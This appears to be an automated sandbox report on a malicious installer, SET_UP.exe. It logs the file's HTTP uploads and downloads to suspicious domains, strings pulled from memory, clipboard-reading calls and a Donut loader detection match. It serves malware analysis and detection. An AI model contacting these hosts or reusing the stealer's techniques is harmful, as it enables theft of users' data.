              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8MGEHNKGXAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8737Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TIHDBRMN46LBT4K4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9T4TJE2W4EL50QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1252Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C2VKRIWGTSFJE8RTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1092Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: throwupset.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: throwupset.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: throwupset.click
              Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
              Source: SET_UP.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: SET_UP.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: SET_UP.exeString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0L
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: SET_UP.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: SET_UP.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: SET_UP.exeString found in binary or memory: http://www.innosetup.com/
              Source: SET_UP.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4128659691.0000000002F4B000.00000004.00000010.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089711383.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127024300.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtFWVO
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtZ
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/9OF
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/aD
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2089711383.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2494026017.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000757000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089321840.0000000000755000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089259947.000000000366C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtack
              Source: SET_UP.exe, 00000000.00000003.1810684533.00000000036F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SET_UP.exe, 00000000.00000003.1810789852.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810684533.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823340570.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810896812.00000000036A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SET_UP.exe, 00000000.00000003.1810789852.0000000003682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SET_UP.exe, 00000000.00000003.1810789852.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810684533.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823340570.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810896812.00000000036A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SET_UP.exe, 00000000.00000003.1810789852.0000000003682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1836344517.0000000003659000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823842802.0000000003659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/8
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/Pt
              Source: SET_UP.exe, 00000000.00000003.1823378295.0000000003656000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/Ze
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2494026017.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1809485265.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1852186136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1809485265.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089447837.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/api
              Source: SET_UP.exe, 00000000.00000003.1809485265.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/api.0
              Source: SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/apiIg
              Source: SET_UP.exe, 00000000.00000002.4127024300.0000000000707000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089447837.0000000000700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/apibu9L
              Source: SET_UP.exe, 00000000.00000003.1849569046.0000000003658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/apim
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/apizuJv_
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/eInt
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/h
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1852131706.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/n
              Source: SET_UP.exe, 00000000.00000003.1809485265.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/ne
              Source: SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click/w
              Source: SET_UP.exe, 00000000.00000003.1849569046.000000000365E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://throwupset.click:443/api
              Source: SET_UP.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE2BB0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_02DE2BB0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE2BB0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_02DE2BB0

              System Summary

              barindex
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\SET_UP.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251E9B3 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0251E9B3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D03F30_2_024D03F3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251E9B30_2_0251E9B3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DE2560_2_024DE256
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EBA100_2_024EBA10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F0A900_2_024F0A90
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F92B50_2_024F92B5
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E7B6A0_2_024E7B6A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02510B600_2_02510B60
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D5B100_2_024D5B10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02508B300_2_02508B30
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E2B300_2_024E2B30
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E83CC0_2_024E83CC
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D8BE00_2_024D8BE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024ED8460_2_024ED846
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250D0000_2_0250D000
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E882D0_2_024E882D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E203F0_2_024E203F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250A0800_2_0250A080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EF0900_2_024EF090
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DC0B00_2_024DC0B0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DA1500_2_024DA150
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FF1660_2_024FF166
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D51600_2_024D5160
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EE17F0_2_024EE17F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EF9700_2_024EF970
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FB9100_2_024FB910
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D71200_2_024D7120
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DA9C00_2_024DA9C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FF9C20_2_024FF9C2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F29C00_2_024F29C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025021C00_2_025021C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E99880_2_024E9988
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D79800_2_024D7980
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250A6500_2_0250A650
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DAE500_2_024DAE50
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E7E160_2_024E7E16
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FBEF20_2_024FBEF2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250C7500_2_0250C750
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D47600_2_024D4760
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02510F000_2_02510F00
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FA7100_2_024FA710
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024ECF330_2_024ECF33
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02503FD00_2_02503FD0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E27C80_2_024E27C8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E0FC60_2_024E0FC6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025107E00_2_025107E0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EA7800_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024FC7AF0_2_024FC7AF
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024DFC5A0_2_024DFC5A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F3C560_2_024F3C56
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F34C00_2_024F34C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025104E00_2_025104E0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E949B0_2_024E949B
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025095100_2_02509510
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F75100_2_024F7510
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EBD300_2_024EBD30
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024EEDC00_2_024EEDC0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D9DF00_2_024D9DF0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02508D900_2_02508D90
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024E15820_2_024E1582
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02501DBB0_2_02501DBB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC12C00_2_02DC12C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBD3CB0_2_02DBD3CB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDC3F30_2_02DDC3F3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBA8400_2_02DBA840
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBC9E60_2_02DBC9E6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD11500_2_02DD1150
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEAEE00_2_02DEAEE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEF6900_2_02DEF690
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD5CA00_2_02DD5CA0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE7CA00_2_02DE7CA0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEEC700_2_02DEEC70
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB85800_2_02DB8580
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBFD120_2_02DBFD12
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE72C00_2_02DE72C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC62FA0_2_02DC62FA
